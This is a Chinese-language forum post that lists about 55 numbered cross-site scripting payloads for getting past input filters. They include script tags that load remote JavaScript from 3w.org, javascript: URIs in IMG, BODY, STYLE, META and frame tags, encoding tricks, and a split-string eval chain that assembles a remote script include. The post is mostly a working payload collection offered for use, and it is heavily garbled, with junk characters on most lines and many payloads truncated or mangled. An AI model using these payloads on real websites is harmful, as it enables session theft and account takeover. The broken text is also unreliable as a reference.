(1)普通的XSS JavaScript注入
" e9 J3 N+ f+ Z# q# [" S1 P |; w<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
8 j9 {& y& v4 U* a(99)另类弹框
4 \( e6 J3 n) G, e( D! t+ k6 t! O<q/oncut=alert()>1+ \+ i( e7 V. I2 a5 N; l0 ~
<s/onclick=alert()>b
7 G4 N j* C! H8 V% w9 {5 t: F <XSS=" onclick="alert(1)//">clickme</SSX=">
# y n% K# S3 _1 W <zzz onclick=alert`1`>clickme</zzz>
( b) u5 ]1 m$ J6 B3 m* D$ { <a onclick=alert`1`>clickme</a>1 B1 f N; Q* y5 P
<a=">clickme</a=">0 |, R: H* b2 V& ?1 N( u
<a=">clickme</a>
5 e7 j. r7 [8 I# |<z=">clickme</z=">
6 b5 I2 p$ V& C4 k& ?<z onclick=alert`1`>clickme</z>
/ ?- {# p- X6 `* o5 R# E2 L3 B1 W5 h! ^6 e; |% k. K4 z. [
(2)IMG标签XSS使用JavaScript命令
2 v% R; q6 ^" A+ z4 e8 B( b<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>$ s+ B% ]7 V$ j7 p, Y3 l
7 Z1 Y: z1 L0 P4 v- L V
(3)IMG标签无分号无引号
0 z1 w; ?$ {! r" {5 {5 U<IMG SRC=javascript:alert(‘XSS’)>6 b% E, A0 y* u4 z! N, Q
7 F& B9 ?) C" d
(4)IMG标签大小写不敏感
( [& i1 `8 V" Z/ t<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
7 ], \2 l4 L( Z/ m# C3 G. x
* s4 ?: f. p F$ R, L6 g- U+ n(5)HTML编码(必须有分号)' d' n- g6 ?9 O3 ]4 d% t& e) d, [( o
<IMG SRC=javascript:alert(“XSS”)>% v; L Z- X) ]+ X- \
: j( O5 u" m+ I* o# k; C( ]2 |
(6)修正缺陷IMG标签. o W7 } k+ N0 l, O; \$ X
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>) z0 B: ^3 s- g' S) d
0 b2 g+ B- @* A Q; A: L
(7)formCharCode标签(计算器)
T) U( I/ X5 J1 E, V* }7 O<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
2 M- Y+ w9 d, m% {. s& |2 i4 T! V# U4 z; J6 D0 g5 A+ E
(8)UTF-8的Unicode编码(计算器)3 N! e; `7 v c8 i4 _5 s" w' V
<IMG SRC=jav..省略..S')>
7 V# y9 H$ n/ A/ h. f3 k0 n i4 G" o i( W, K
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)9 W5 I5 ^" ?% [2 z& m+ n2 {2 |
<IMG SRC=jav..省略..S')>2 s, `" G: q) t0 {# X) a! J& O
. T. q0 k: W$ d4 C5 d& n% Y(10)十六进制编码也是没有分号(计算器)0 ~' {- D4 b* b& L
<IMG SRC=\'#\'" /span>
' y$ X1 e" a+ A3 d# n( g2 O. C1 S, V$ b# u+ Z# \; @% \6 T& c
(11)嵌入式标签,将Javascript分开
' h! j+ [- E: |; n<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
" F7 f+ {( q( |( F0 u
. `! H. X+ t! v K0 K. [# U1 R- m# F- ?(12)嵌入式编码标签,将Javascript分开0 n3 ], x& [8 X9 L) x( b
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”># M: R! h" B1 d0 y7 i
( E5 V C2 Y8 r7 m(13)嵌入式换行符- ]( o0 K2 O. \
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
8 O& Q% `; Z4 @0 o$ K' g- P' \- G+ i' r$ S
(14)嵌入式回车2 S; P* h9 X' [+ d7 S# s
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
' W2 O8 i8 J) F# h8 @* H: p, I* J) g
$ {, w" X. A/ s w$ Z(15)嵌入式多行注入JavaScript,这是XSS极端的例子& O7 S6 f# q/ a! J0 R6 q5 f
<IMG SRC=\'#\'" /span>
9 O3 N6 Q1 x- W3 g- Y2 u
! q1 b3 E' b8 o5 l2 w4 L/ |(16)解决限制字符(要求同页面)
& p( f5 p; g1 Y; Z7 J5 p<script>z=’document.’</script>
/ O) z: ~$ Q6 {0 V6 G7 p2 G<script>z=z+’write(“‘</script>
$ ]9 W. w6 H" H<script>z=z+’<script’</script>
- K4 i$ e" G7 N9 i& P7 {1 R& F<script>z=z+’ src=ht’</script>" W/ V2 j; S5 n1 W, F
<script>z=z+’tp://ww’</script>6 f8 D3 a- I3 K+ j, ^
<script>z=z+’w.shell’</script>2 X" }' o/ D/ H: H" V
<script>z=z+’.net/1.’</script>" Q' l$ b/ Y* P( d; F
<script>z=z+’js></sc’</script>
) m$ `# `2 X! z, a<script>z=z+’ript>”)’</script>& O3 B( E+ U5 v/ R1 q" ^
<script>eval_r(z)</script>+ M0 e6 R) f9 u" |
- o) N2 h$ w" {1 r) D0 f( T* e/ M
(17)空字符( M% u' B1 z5 J7 D
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out; A: m/ q7 x# L0 T( M- }
0 A4 u( T& o9 c8 }+ K* g! ?(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
( }- d" z7 ]9 A/ u: ~3 Iperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
$ |: p& Q" v1 U: {8 v
9 f4 c1 b* ` y: c(19)Spaces和meta前的IMG标签- c4 ]7 k9 r& B, ?# U1 d w
<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>
! K% y3 ^) j x8 p
) `* t6 @. i6 g) x" {(20)Non-alpha-non-digit XSS6 `3 T" y# W, m; C
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
& }6 Q6 N0 | d* m, q6 `; L5 f+ Z8 T l( P7 r8 A' T
(21)Non-alpha-non-digit XSS to 2/ h5 }5 N! @8 f" t( { H3 k
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
/ J. O- g' A6 g2 q1 F2 N
! a5 m4 P7 e9 S3 |0 F(22)Non-alpha-non-digit XSS to 3
$ b' N# m6 q u4 e; R<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>- B$ S! ]/ i6 P" I8 B, g& E
6 C' X9 `* w+ u$ H$ V$ y0 E! c
(23)双开括号
9 A5 i3 ^2 i' i<<SCRIPT>alert(“XSS”);//<</SCRIPT>- _ p; a9 I+ q, D3 B* ], w$ R
1 F2 t% X, J* T6 ~& N) R9 Z8 r4 s(24)无结束脚本标记(仅火狐等浏览器)) k: U& o3 Q$ t6 ?
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>/ d3 `, F# b7 d
2 t$ g/ ^( t- y3 n% u5 G- V
(25)无结束脚本标记2( q+ z2 ?) }4 Q+ c
<SCRIPT SRC=//3w.org/XSS/xss.js>' @0 `1 i0 {2 A( ^2 ^/ @& }
3 ~+ D6 c# O5 e* D9 [. |& p
(26)半开的HTML/JavaScript XSS$ w; O' F% p# e1 E6 X
<IMG SRC=\'#\'" /span>
) W' r/ |/ y! M% k) q0 g$ o: c3 q7 E: Y8 Z; _( U
(27)双开角括号
+ g4 b3 Q( X, G/ Q<iframe src=http://3w.org/XSS.html <
' o! r1 c1 a* A3 F$ S+ j; r0 ]3 G3 k: z) C0 c
(28)无单引号 双引号 分号& p9 S7 y; W; t" _2 b
<SCRIPT>a=/XSS/5 E c2 S( A6 h; K+ ], ^9 F
alert(a.source)</SCRIPT>- V" u4 W; X7 R4 n" E
& i) m2 h/ V7 M* j, b(29)换码过滤的JavaScript- u( d/ O% d; ?, J% l
\”;alert(‘XSS’);//
- {/ g4 P4 a" q4 d- Y$ E1 S8 B) z3 F2 z8 K" ?8 {
(30)结束Title标签
* U4 ?% {, c: N8 A4 j6 f' P</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
" H4 J; n2 B; y0 c# t
& o1 L' w8 `4 z+ ^) |(31)Input Image9 `, Q1 w0 M9 n2 I
<INPUT SRC=\'#\'" /span>
- w$ @5 a3 c7 u8 }0 Y6 F# z$ w
( W; G, Z0 y1 F5 V# a+ R(32)BODY Image& w( a( |' c8 K3 \
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>. ^# K# A' b9 w" U+ p* w5 \
5 y+ V f5 r: ?* K( K( J(33)BODY标签
& Z; \2 f4 ` d: ?0 N1 o<BODY(‘XSS’)>
$ {! F5 j: y" x3 ?4 H8 j( t6 P% O& r: @# n) t
(34)IMG Dynsrc2 I( `: G1 d; ]' b A- \# D
<IMG DYNSRC=\'#\'" /span>7 k8 t: V" f1 P; v! R
# p( _9 P& K# S/ N* u9 j
(35)IMG Lowsrc
/ B$ D5 G% h& n1 f1 X( b" r) F<IMG LOWSRC=\'#\'" /span>/ D; j0 j: n+ n+ M Y" ?4 J
; p9 ]- V; w M3 `- g9 ~4 w(36)BGSOUND1 L+ @2 @! O- t g. N5 J4 k
<BGSOUND SRC=\'#\'" /span>
3 r/ j, n$ ?6 W3 g
& H. n. ^+ T6 `3 C0 w' n; K+ Q(37)STYLE sheet. V0 m( o) s% p: U A2 B) A6 o
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>, V7 A; V5 K2 n/ b
3 ^# C' n4 J# w; ~4 {+ u1 \. M& p(38)远程样式表
0 Z2 O6 m, j8 h$ T$ p+ s' e<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
* \* E( y' M. s3 o6 c( m P9 {, A [3 S
(39)List-style-image(列表式)
- g& G/ ]8 M4 V% P+ N<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS% |9 A8 K' Z9 @$ B* `1 j
, b* [- ~! A+ W& n+ B: j
(40)IMG VBscript
" } P0 A$ u+ v<IMG SRC=\'#\'" /STYLE><UL><LI>XSS
! ]3 Y1 ^0 I' y9 d) X
- D7 z1 v' X" a. t& F(41)META链接url8 A( s6 p6 v) n) ` G- K
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”> u, P; Y' M7 t! ^# I
" h9 S1 c; G( p0 |, W(42)Iframe
" g! z" j) b f2 |# d) F* S: C<IFRAME SRC=\'#\'" /IFRAME>4 R! e0 P1 a: S9 g' C3 Q% q, a) Y
+ M1 Q0 F0 d: I" A; h(43)Frame) Y1 I* m1 K1 X. i8 a9 D" `/ @
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
; w& b3 }- t4 S1 `; G* B5 R! \
1 W* @" D6 X. V2 N0 T( W, j$ }- C6 D(44)Table
* u( I! W N8 u6 A5 _1 {! ~* g/ i3 p<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
7 k7 i5 ~% a! O6 Z" g8 `5 `6 u( B0 h* Y
(45)TD
# h9 a7 p5 C/ f, U6 O) J<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>. e5 Q5 o( Y, X# g+ l. o8 b/ v
. p& h# g7 I: l1 C
(46)DIV background-image! S& c5 ^6 g/ u/ n: \, I
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
" N* N* _% d- C* O$ X! [
! k) v5 U- t! }/ e( T3 z4 K(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
, L3 z: @3 Z; R<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
1 P! P+ n/ t! H2 s% X2 [2 r& B& o- k9 {( p6 N# D9 ~8 ^# S: }% Z
(48)DIV expression! M0 D' |, _+ q3 n. k) S/ E. Y
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>2 m6 h/ p5 K; }% P5 `) A
# S9 k- U( R9 o3 i3 B* j1 ~. ^
(49)STYLE属性分拆表达
f2 t( L k& H" a" y) O<IMG STYLE=”xss:expression_r(alert(‘XSS’))”># o6 e' E% U' M
) s5 V+ F$ z9 t: C/ J, j' @(50)匿名STYLE(组成:开角号和一个字母开头)+ q% h! a2 ~8 e' Q
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
' o- F e1 \7 T7 Z/ M0 x m! R: ?1 [$ H
(51)STYLE background-image2 k. d0 l0 B' O6 Q8 ^9 E+ ^
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
$ r" o5 t# z3 ^ N9 a9 s: G0 j7 ~
(52)IMG STYLE方式. h) \' M, N( g) a% ?3 `& T8 l/ {
exppression(alert(“XSS”))’>" V$ F; b1 O/ e" B$ _ g0 @: O
6 B' e- J9 T, D* Y(53)STYLE background
$ s/ q: \2 d' C% v) c2 h<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
/ {, k7 l" \! [. K7 f/ p( L& z7 a5 h+ T
(54)BASE
/ c4 l3 d a1 _<BASE HREF=”javascript:alert(‘XSS’);//”>' B9 Y" m2 a7 T/ x* b
% y& D' P3 ^7 r5 d7 z7 R0 e(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS; J- `9 N: s' D' l. q
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>: r* q: p1 T3 Q# z K
|
发表于 2016-4-28 10:06:15
收藏
支持
反对